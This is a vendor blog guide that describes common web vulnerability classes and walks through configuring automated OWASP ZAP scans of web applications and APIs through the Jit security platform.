A Step-by-Step Guide to Automated Penetration Testing with Jit

Attackers are not just targeting obvious vulnerabilities but actively searching for new and unexpected weak spots. If you’re not regularly testing your defenses, you’re practically inviting them in.

The number of reported Common Vulnerabilities and Exposures (CVEs) rose by 30% in the first half of 2024. New security gaps are appearing, and—even more concerning—old vulnerabilities are finding their way back into companies’ systems.

The most effective way to uncover hidden vulnerabilities within your environment is to think like an attacker. By simulating real-world attacks, penetration testing goes deeper than other security scans, helping you understand where your risks truly lie. 



How Does Penetration Testing Work?

Penetration testing, or pen testing, is a method for evaluating the security of a system, network, or application by simulating a cyberattack. Companies usually outsource it to a specialized third-party vendor to identify hidden vulnerabilities that malicious actors could exploit and other security scans might miss. 

Pen testing typically starts with surveillance, where pen testers gather detailed information about the target, such as domain names, IP addresses, and potential entry points. The system is analyzed for open ports, services, and known vulnerabilities. 

When the exploitation phase begins, testers attempt to breach the system by exploiting these vulnerabilities, using methods that mirror real-world attack strategies. The tester's findings, the methods used to find them, and any remediation recommendations are compiled into a report.



While manual testing helps identify complex, context-specific issues, advanced security tools can automate this process. They are increasingly effective for rapidly scanning systems, identifying common vulnerabilities, and handling large-scale environments. 

These tools can integrate with the rest of your DevOps security stack to continuously monitor for new threats and perform deep, consistent scans faster than manual methods.

What Can Penetration Testing Uncover?

1. Broken Authentication and Session Management

Broken authentication and session management refer to weaknesses in how users log in and maintain their sessions. Issues here include weak password policies, inadequate session expiration times, and poor handling of session tokens. For example, if session tokens are stored insecurely, they could be hijacked, allowing attackers to impersonate legitimate users. 



2. Injection Vulnerabilities

Injection vulnerabilities are becoming an increasingly common attack vector. In 2023, 40 banks worldwide and over 50,000 users fell victim to JavaScript injection attacks. 

These vulnerabilities appear when untrusted input, like user data, is directly included in queries or commands without proper validation. Attackers can inject malicious code and alter database queries or commands, leading to data theft, privilege escalation, or complete system compromise. 

3. Security Misconfigurations

Security misconfigurations are among the most common vulnerabilities. They can range from simple oversights, like leaving default credentials in place or failing to review user access for a simple update, to more complex issues, such as misconfigured access controls in cloud environments. These misconfigurations might leave unnecessary services running or create insecure network settings. 



4. Sensitive Data Exposure

Sensitive data exposure happens when private information—such as personal details, financial data, or authentication credentials—becomes easily accessible for attackers to exploit. This can occur due to a lack of critical security controls, including improper encryption, poor data storage practices, or insecure transmission methods. Its consequences include data breaches, identity theft, or financial loss.

5. Broken Access Control

Broken access control is when users can perform actions beyond their intended permissions. This can occur if role-based access controls are not adequately enforced, allowing users to access restricted data or functions. If attackers can escalate privileges to an admin level, they can gain complete control over your systems. 

6. Cross-Site Scripting (XSS)

Cross-site scripting (XSS) vulnerabilities occur when unsanitized user input is executed as code in the browser, enabling attacks like session hijacking or data theft. Automated tools identify common XSS vectors, while manual testing uncovers complex, context-dependent injection points, such as DOM-based XSS or obscure user inputs.



A Step-by-Step Guide to Automated Penetration Testing with Jit

OWASP ZAP is an open-source tool that simulates real-world attacks to find security flaws in web applications, such as SQL injection, cross-site scripting (XSS), and insecure settings. 

You can customize the depth and focus of the scans. ZAP is especially useful when integrated into your CI/CD pipeline, enabling continuous security checks without slowing development. It also provides detailed reports to help you fix any issues it finds.



You can learn how to run an OWASP ZAP scan on its own, but setting it up with Jit automates ZAP deployment and continuous scanning. The step-by-step guide for deploying ZAP with Jit will take you through the process.

When you integrate OWASP ZAP with Jit, the penetration testing process becomes fully automated and more efficient. The ASPM platform uses ZAP’s scanning power through its Security Plans, letting you run tests directly from its platform. 

These plans handle the setup, execution, and analysis of ZAP scans, streamlining your workflow. The platform automatically triggers daily scans, organizes results, and prioritizes vulnerabilities using advanced filtering and contextual analysis.

1. Prerequisites

Before getting started, ensure you have the following in place:

• A Jit account with access to the platform. You can create an account for free if you haven’t already done so. 

• Administrative access to the application or system you plan to test.

2. Activate the Dynamic Application Security Testing Plan

Begin by logging into Jit and navigating to the Security Plans tab. Select the Dynamic Application Security Testing Plan to access the scanning controls. Click the Activate option to either Scan your API for vulnerabilities or Scan your web application for vulnerabilities (or both!) to initiate the OWASP ZAP setup process.



3. Configure OWASP ZAP for Automated Penetration Testing

Start by identifying a web app to configure automated penetration testing. If needed, Jit can scan multiple web apps at once – just hit “Add new application” to add an additional web app.



In the Configure Security Control pop-up window, you need to supply the following information (see screenshot below):

• Application Name

• Target URL – Enter the web application URL you want to scan.

• Exclude URLs (optional)

• API Domain –  If your web application is tied to an API, add the relevant domain to include it in the scan.

To enable authentication, you’ll need to contact Jit. 



You can also define trigger conditions or set up real-time notifications through Slack integration. 

The scan runs daily by default, but you can configure it to trigger on every deployment. 



4. Configure OWASP ZAP for API Scanning

If you’re focusing on API security, provide the following information to configure OWASP ZAP:

• Application Name

• Upload an OpenAPI File – Upload an OpenAPI (formerly known as Swagger) file. This file defines the endpoints that OWASP ZAP will scan, providing a roadmap for the testing process.

• Exclude URLs

• API Domain—Input the base URL where your API is hosted. OWASP ZAP will use this URL as the entry point for making requests.

Again, you may need to contact Jit support to set up authentication. You can customize trigger conditions and set up notifications through Slack for your API if you'd like. 



5. Automated Penetration Testing

OWASP ZAP will automatically run daily or with each deployment, depending on your chosen triggers, to keep your application or API continually tested and secure.

6. Review, Prioritize, and Remediate Vulnerabilities

Once you receive OWASP ZAP scan results, it's time to manage and address the security findings effectively. You can view the results in Jit’s backlog. Filter the security findings to focus on the most critical issues quickly.

You can further streamline the remediation process by using Jit Actions to address vulnerabilities in bulk. Jit can automatically create pull requests (PRs) that fix multiple vulnerabilities at once to make the resolution process more efficient on your end. 

Align penetration testing to specific objectives

While implementing automated penetration testing can help security teams uncover critical security vulnerabilities, it can be difficult to align these checks to specific outcomes: like surfacing vulnerabilities described in the OWASP Top 10 or satisfying items in the OWASP ASVS framework. 

For this reason, Jit builds Security Plans that align penetration testing checks to specific line items in these security frameworks. In the example below, you can activate Jit security checks – based on OWASP ZAP – that align to items in OWASP Top 10, like surfacing Broken Access Control or Injection vulnerabilities.



Closing the Gaps with Jit

Automated penetration testing is often a front line of defense, finding the gaps that attackers are counting on—whether it's injection flaws, weak authentication, or misconfigurations. Automated tools like OWASP ZAP can dig deep and fast, flagging those risks before they’re exploited.

Jit helps you take the fuss out of pen testing your applications and APIs by integrating the power of OWASP ZAP directly into your CI/CD pipeline. The ASPM platform automates your scans, organizes the findings, and even automates remediation fixes, helping you prioritize and resolve vulnerabilities with enriched insights. Why guess about the strength of your defenses when you can know for sure? Visit Jit to learn more.